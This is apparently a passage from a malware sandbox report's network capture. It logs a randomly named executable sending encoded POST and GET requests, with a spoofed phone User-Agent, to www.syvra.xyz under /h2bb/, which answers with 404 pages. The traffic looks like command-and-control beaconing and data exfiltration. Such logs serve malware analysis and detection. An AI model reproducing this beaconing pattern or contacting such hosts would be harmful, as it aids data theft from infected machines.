                    Data Raw: 36 58 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 72 31 70 77 36 31 51 4d 6f 54 56 4e 2f 6f 74 76 6f 49 69 73 70 4f 78 43 7a 4b 31 5a 61 33 42 71 50 4f 57 63 48 4a 4f 59 32 42 31 64 73 6b 49 2f 4a 2f 55 6e 68 30 32 2b 79 68 53 79 4a 56 49 78 6a 66 68 75 61 43 6d 78 74 31 43 39 5a 4d 43 39 2f 36 76 4f 55 33 31 78 69 4d 7a 42 6b 71 6f 32 59 58 5a 68 65 52 39 63 54 46 77 66 6a 54 31 62 68 44 6f 51 53 36 54 49 58 70 68 36 57 63 72 68 6d 47 6b 4c 47 33 48 74 42 77 41 50 6b 4b 69 45 67 65 5a 68 66 37 74 61 6b 7a 55 5a 48 4b 59 72 66 53 46 7a 47 4f 4f 46 36 6e 46 2f 67 41 32 59 42 63 61 33 58 78 4f 38 49 52 44 69 39 50 4c 54 72 78 31 66 41 46 6b 77 62 76 4d 3d
                    Data Ascii: 6X=nLi3hk6LsWGqr1pw61QMoTVN/otvoIispOxCzK1Za3BqPOWcHJOY2B1dskI/J/Unh02+yhSyJVIxjfhuaCmxt1C9ZMC9/6vOU31xiMzBkqo2YXZheR9cTFwfjT1bhDoQS6TIXph6WcrhmGkLG3HtBwAPkKiEgeZhf7takzUZHKYrfSFzGOOF6nF/gA2YBca3XxO8IRDi9PLTrx1fAFkwbvM=
                    Sep 22, 2024 17:40:37.650108099 CEST1236INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:40:37 GMT
                    Server: Apache
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 16052
                    X-XSS-Protection: 1; mode=block
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                    Sep 22, 2024 17:40:37.650151968 CEST224INData Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
                    Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transfo
                    Sep 22, 2024 17:40:37.650216103 CEST1236INData Raw: 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 30 31 35 30 36 38 37 2c 30 2c 30 2c 31 31 2e 31 39 33 39 32 33 2c 2d 31 2e 33 38 39 35 39 34 35 2c 2d 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c
                    Data Ascii: rm="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263
                    Sep 22, 2024 17:40:37.650259972 CEST1236INData Raw: 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20
                    Data Ascii: e-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914
                    Sep 22, 2024 17:40:37.650301933 CEST1236INData Raw: 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74
                    Data Ascii: 475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433
                    Sep 22, 2024 17:40:37.650362968 CEST672INData Raw: 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                    Data Ascii: 46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.4
                    Sep 22, 2024 17:40:37.650404930 CEST1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20
                    Data Ascii: ;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16
                    Sep 22, 2024 17:40:37.650470972 CEST1236INData Raw: 36 2e 36 36 33 35 36 20 31 2e 34 35 38 35 30 35 2c 35 2e 38 30 34 31 36 20 31 2e 34 35 38 35 30 35 2c 36 2e 39 38 32 35 37 20 32 2e 34 30 32 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37
                    Data Ascii: 6.66356 1.458505,5.80416 1.458505,6.98257 2.402021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.115
                    Sep 22, 2024 17:40:37.650512934 CEST1236INData Raw: 2e 34 37 34 39 39 36 2c 35 34 2e 37 34 32 33 39 20 31 2e 31 31 39 39 33 32 2c 31 39 2e 38 30 33 37 39 20 32 2e 34 31 35 35 37 34 2c 33 37 2e 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20
                    Data Ascii: .474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path i
                    Sep 22, 2024 17:40:37.650557041 CEST672INData Raw: 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b
                    Data Ascii: display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142
                    Sep 22, 2024 17:40:37.655469894 CEST1236INData Raw: 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 65 6c 6c 69 70 73 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 79 3d 22 34 2e 36 37 31 35 37 31 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20
                    Data Ascii: ty:1;" /> <ellipse ry="4.6715717" rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rul


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.449744162.0.213.94805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:39.606311083 CEST10829OUTPOST /h2bb/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.syvra.xyz
                    Origin: http://www.syvra.xyz
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.syvra.xyz/h2bb/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 6e 4c 69 33 68 6b 36 4c 73 57 47 71 72 31 70 77 36 31 51 4d 6f 54 56 4e 2f 6f 74 76 6f 49 69 73 70 4f 78 43 7a 4b 31 5a 61 30 68 71 50 34 61 63 42 75 36 59 35 68 31 64 79 30 49 2b 4a 2f 55 66 68 30 76 32 79 68 66 50 4a 57 67 78 69 35 56 75 4e 6a 6d 78 30 46 43 39 45 38 43 77 77 61 75 4d 55 33 6c 39 69 4d 6a 42 6b 71 6f 32 59 52 31 68 58 67 39 63 52 46 77 51 70 7a 31 70 72 54 70 50 53 37 33 59 58 70 6c 41 57 6f 6e 68 6d 6d 30 4c 45 6b 76 74 4b 77 41 4e 6c 4b 69 6d 67 65 6c 45 66 2f 31 38 6b 33 55 33 48 4c 67 72 64 6a 41 74 66 64 2b 47 74 55 4e 68 38 42 47 61 4e 62 32 74 49 6a 47 64 42 54 6e 65 68 66 54 71 78 52 45 39 58 45 74 71 43 62 49 75 34 49 70 36 71 68 35 35 6f 41 6d 44 50 79 2f 44 44 78 53 57 36 44 46 72 6c 52 38 79 53 34 32 62 42 39 70 55 33 66 61 57 74 44 2b 49 51 64 75 42 61 4f 6d 6f 77 43 6f 57 71 41 6c 44 68 74 51 5a 54 58 41 4f 76 56 52 61 45 49 41 58 50 31 36 44 49 48 38 47 68 74 4c 4b 44 71 37 61 39 6c 63 56 63 37 4b 6e 35 36 49 4e 78 58 68 61 73 33 4e 61 55 57 31 65 5a 4f 4c [TRUNCATED]
                    Data Ascii: 6X=nLi3hk6LsWGqr1pw61QMoTVN/otvoIispOxCzK1Za0hqP4acBu6Y5h1dy0I+J/Ufh0v2yhfPJWgxi5VuNjmx0FC9E8CwwauMU3l9iMjBkqo2YR1hXg9cRFwQpz1prTpPS73YXplAWonhmm0LEkvtKwANlKimgelEf/18k3U3HLgrdjAtfd+GtUNh8BGaNb2tIjGdBTnehfTqxRE9XEtqCbIu4Ip6qh55oAmDPy/DDxSW6DFrlR8yS42bB9pU3faWtD+IQduBaOmowCoWqAlDhtQZTXAOvVRaEIAXP16DIH8GhtLKDq7a9lcVc7Kn56INxXhas3NaUW1eZOLyM7AESox421PPWFIRxxF5PV4i50/00YPfqtwNfAt0N15I4pC+uD6PaJcikMCId8ZcQdxB6ZweQzph/KH7/n4UL0UYCVjuSsGOZCpC33UDFka4iH5dLltAYshMAhBezFyhRgiyP8VQkRs8lEhV7jdHo/EuigrQUthCJBm7WyzZWPV+U2xmHXuNv/za66GFPnxU3NMO7BmoA/PFE+nBgV13GfInbIAsGPkS12ewehVJOqtlpLkvT5lrUSDvhDzydLujPHe2kGXvQT/DfvrfDW8CrUOht1iPhxUq4aNx48u26HIpDqr1ABUSOPwwl7iXHNm4R6/vpFOKOr3Woyb9Uvm7qoETcM9R1D/Go86Uhz/c3X3eheE0He3G8IGWRj9kvl4JeczzaRTbGJ45IVCTkz/Ft2KkJqbvuaV2b1dCIUP4+yfIzPSrEu04lkVKf0RpuuQBEMsAwnA/uYeK1y+gAYsar2gi//BbO/WTbKVwGCiY44TX819sTraPz4Z7yvKcLhhUrAYtGtj1lc9dH6roNgwPYB0IADXQHFuLfU86Hr+nNV9DwgfAgaw2SXmMlb592YtYWhq2EbFZe/mtRGzx8pqmmPIBm2uJGFsDs42WOelaTbosYimZSsYLBTeKhU3QlLCRK8jDiV3/XClpeTWdsw6SeXtudVhXBlSGH [TRUNCATED]
                    Sep 22, 2024 17:40:40.218364000 CEST1236INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:40:40 GMT
                    Server: Apache
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 16052
                    X-XSS-Protection: 1; mode=block
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                    Sep 22, 2024 17:40:40.218390942 CEST224INData Raw: 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67
                    Data Ascii: "stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transfo
                    Sep 22, 2024 17:40:40.218410015 CEST1236INData Raw: 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 30 31 35 30 36 38 37 2c 30 2c 30 2c 31 31 2e 31 39 33 39 32 33 2c 2d 31 2e 33 38 39 35 39 34 35 2c 2d 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c
                    Data Ascii: rm="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263
                    Sep 22, 2024 17:40:40.218425989 CEST1236INData Raw: 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20
                    Data Ascii: e-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914
                    Sep 22, 2024 17:40:40.218444109 CEST1236INData Raw: 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74
                    Data Ascii: 475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433
                    Sep 22, 2024 17:40:40.218461037 CEST1236INData Raw: 34 36 2e 33 33 33 32 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                    Data Ascii: 46.33323" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.4
                    Sep 22, 2024 17:40:40.218744993 CEST1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 33 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                    Data Ascii: ;stroke-opacity:1;" /> <path id="path4533" d="m 89,123.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.
                    Sep 22, 2024 17:40:40.218760014 CEST552INData Raw: 2e 32 33 35 36 39 33 2c 32 33 2e 34 38 38 33 35 20 30 2e 32 33 35 36 39 33 2c 33 36 2e 35 35 30 37 32 20 2d 31 30 65 2d 37 2c 31 33 2e 30 36 32 33 38 20 2d 30 2e 31 31 37 38 33 33 2c 32 37 2e 34 33 37 39 36 20 2d 30 2e 30 35 38 39 31 2c 34 35 2e
                    Data Ascii: .235693,23.48835 0.235693,36.55072 -10e-7,13.06238 -0.117833,27.43796 -0.05891,45.3521 0.05892,17.91413 0.29461,39.36153 0.707091,58.80738 0.412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stro
                    Sep 22, 2024 17:40:40.218776941 CEST1236INData Raw: 39 30 39 32 2c 37 2e 37 37 38 30 35 20 2d 31 2e 38 38 35 37 30 38 2c 31 30 2e 30 37 37 30 36 20 2d 30 2e 32 39 34 37 38 39 2c 32 2e 32 39 39 30 31 20 2d 30 2e 34 31 32 35 36 37 2c 35 2e 30 30 37 39 20 35 2e 31 65 2d 35 2c 31 37 2e 35 36 33 33 39
                    Data Ascii: 9092,7.77805 -1.885708,10.07706 -0.294789,2.29901 -0.412567,5.0079 5.1e-5,17.56339 0.412617,12.55548 1.355064,34.93859 2.474996,54.74239 1.119932,19.80379 2.415574,37.00049 3.712005,54.20767" style="display:inline;fill:none;stroke
                    Sep 22, 2024 17:40:40.218791008 CEST224INData Raw: 2e 33 35 38 32 36 2c 2d 30 2e 31 37 36 37 32 20 36 2e 34 32 33 33 2c 2d 30 2e 31 37 36 37 32 20 39 2e 34 38 37 30 32 2c 2d 30 2e 35 38 39 32 32 20 33 2e 30 36 33 37 32 2c 2d 30 2e 34 31 32 35 31 20 36 2e 31 32 38 38 35 2c 2d 31 2e 32 33 37 37 34
                    Data Ascii: .35826,-0.17672 6.4233,-0.17672 9.48702,-0.58922 3.06372,-0.41251 6.12885,-1.23774 9.1918,-2.06238" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                    Sep 22, 2024 17:40:40.225579977 CEST1236INData Raw: 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 36 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 31 33 2e 31
                    Data Ascii: e-opacity:1;" /> <path id="path4560" d="m 13.113199,198.16821 c 47.547038,0.40361 95.093071,0.80721 142.638101,1.2108" style="display:inline;fill:none;stroke:#000000;stroke-width:1.00614154px;st


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.449745162.0.213.94805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:40:42.147308111 CEST479OUTGET /h2bb/?6X=qJKXiU3Y6HiR5EQ+73Yb2xdirYIwqZi0pOwD+eljRGtAAZDjMN2OxhxU5kptMPcWm3rk9DqOdiozjqcfWB2Wk1O1f7az6dmfaFVy77DKkP1oB1oCVi4cG1g=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.syvra.xyz
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:40:42.733640909 CEST1236INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:40:42 GMT
                    Server: Apache
                    X-Frame-Options: SAMEORIGIN
                    Content-Length: 16052
                    X-XSS-Protection: 1; mode=block
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                    Sep 22, 2024 17:40:42.733659983 CEST224INData Raw: 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 73 74 6f 70 2d 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 73 74 6f 70 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20
                    Data Ascii: style="stop-color:#000000;stop-opacity:1;" /> </linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path
                    Sep 22, 2024 17:40:42.733676910 CEST1236INData Raw: 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 30 31 35 30 36 38 37 2c 30 2c 30 2c 31 31 2e 31 39 33 39 32 33 2c 2d 31 2e 33 38 39 35 39 34 35 2c 2d 32 36 38 35 2e 37 34 34 31 29 22 0a 20 20 20 20 20 20 20 20
